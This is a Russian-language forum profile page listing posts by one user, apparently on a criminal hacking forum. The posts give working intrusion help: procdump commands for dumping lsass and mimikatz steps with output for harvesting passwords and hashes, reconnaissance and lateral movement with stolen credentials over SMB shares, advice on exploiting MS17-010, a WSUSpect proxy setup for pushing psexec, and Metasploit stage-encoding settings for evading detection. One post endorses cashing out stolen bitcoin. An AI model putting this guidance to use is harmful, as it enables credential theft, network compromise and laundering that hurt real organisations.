Перейти к содержанию

admz

Пользователь
  • Публикаций

    32
  • Зарегистрирован

  • Посещение

Репутация

54 Excellent

Информация о admz

  • Звание
    Rank №2
  1. Вопрос по инжектам

    я не в теме, хотелось сказать ТСу Что бы что-то получить - над что-то отдать, напиши опыт и тебе помогут, наверное :D
  2. Нужен eternalblue или rms

    ТС ваш вопрос выглядит примерно вот так: Нужны 21 диски хром, что бы когда нажимаешь педаль газа, машина ехала - не вставляя ключ в зажигание
  3. ТС красавчик, мало того что годноты подкинул еще и оттестил!
  4. Приветствую, зашел в тему так как думал что будет инфа по тому как очистить чей-то кош от бтк :lol: По теме считаю что бтк в нал за щедрый процент, при условии что обе стороны понимаю что это за бтк, лучшее решение.
  5. Dump Win 10

    ТС я как раз дал тебе то что нужно. Пасы не всегда берет, хеши хавает всегда #Делаем дамп процесса======================================================================== ======================== procdump64.exe -accepteula -nobanner -ma lsass.exe lsass.dmp procdump.exe -accepteula -nobanner -ma lsass.exe lsass.dmp rar.exe a -ep2 -m5 s39331.rar lsass.dmp #Обрабатываем дамп в mimikatz - получаем вывод с хешами и пассами sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords #Делаем на стороне, под виндой c:\temp\x64>dir Volume in drive C is OS Volume Serial Number is 93D3-F5ED Directory of c:\temp\x64 07/25/2017 05:17 PM 71,814,569 lsass.dmp 07/20/2017 01:37 AM 792,064 mimikatz.exe c:\temp\x64>mimikatz.exe .#####. mimikatz 2.1.1 (x64) built on Jul 20 2017 01:37:08 .## ^ ##. "A La Vie, A L'Amour" ## / \ ## /* * * ## \ / ## Benjamin DELPY 'gentilkiwi' ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 21 modules * * */ mimikatz # cd c:\temp\x64 Cur: c:\temp\x64 New: c:\temp\x64 mimikatz # sekurlsa::minidump lsass.dmp Switch to MINIDUMP : 'lsass.dmp' mimikatz # sekurlsa::logonPasswords Opening : 'lsass.dmp' file for minidump...
  6. Dump Win 10

    хз что тебе дампить над, как вариант процесс procdump64.exe -accepteula -nobanner -ma lsass.exe lsass.dmp
  7. ТС для того что бы выполнить тебе желаемое, необходимо сделать порядок действий, собрать информацию, сделать ее анализ и решить как дальше действовать. Немного подскажу как) В первую очередь тебе надо снять следующее: cmd: netstat -anp tcp arp -a net view /all nslookup hostname Это позволит тебе понять что вообще в сети происходит, какие сегменты сети еще присутствуют. И скорее всего нслукапом выхватишь хостнейм и ип контроллера домена. Собрал сегменты сети, сканируешь их на порт 445 0/24. Формируешь список активных, берешь креды(лог:пас) что снял с твоего хоста и с этими кредами пытаешь подключится хотябы к сетевой шаре. Если ты вошел под учеткой локального админа или создал токен, попробуй прогнать все ипы вот таким образом \\192.168.10.151\c$\ Если креды подойдут ты увидишь диск C: хоста в сети а знач доступ к хосту. Проверить креды на валид по сети можно многими способами, этот я думаю для тебя будет самый понятный. Так же стоит проверить список хостов что ты собрал на наличие уязвимости 17_010 и если она есть, разобраться как и эксплуатировать ее.
  8. Хакер = shell/soft = материальное/моральное/духовное удовлетворение
  9. ТС вот ты если бы больше инфы давал, больше бы ответов толковых получил, сколько машин в сети, какие оси, где ты где они и тд, какие креды есть Причем не цифрой 20 пк а список хостов с ипами выложи, естественно отредактируй что бы не палить исходные данные.
  10. Что касается 17_010 иногда даже полезно сделать BSOD, после, уязвимость отлично эксплуатируется а до может и не давать желаемый результат.
  11. Приветствую, а можно поподробнее про пункт 1? Возможно ли его юзать со стороны? Он же вроде использует интерфейс, который должен быть в локальной сети. А если он далеко на впс, как построить маршрут? На сколько я понял MITMf делает тоже самое, но ему тоже нужен интерфейс с которого он слушает. ТСу, я не понял креды есть или нету? Если есть в чем проблема заюзать psexec?
  12. DCShadow

    ох и интересная софтина там в видео маячит)) PingCastle
  13. Все настроил и запустил root@root:/tmp/wsuspect-proxy# proxychains python wsuspect_proxy.py psexec 8080 ProxyChains-3.1 (http://proxychains.sf.net) 2018-05-15 21:08:15 0300 [-] Log opened. 2018-05-15 21:08:15 0300 [-] InterceptingProxyFactory starting on 8080 2018-05-15 21:08:15 0300 [-] Starting factory Получается теперь необходимо ждать пока таргет захочет обновится и полезет к проксе? Это же можно очень долго ждать, не так ли?
  14. когда задаете опции пэйлоада, например set lhost, set lport, выставить эти опции попробуйте set EnableStageEncoding true set StageEncoder x86/shikata_ga_nai
×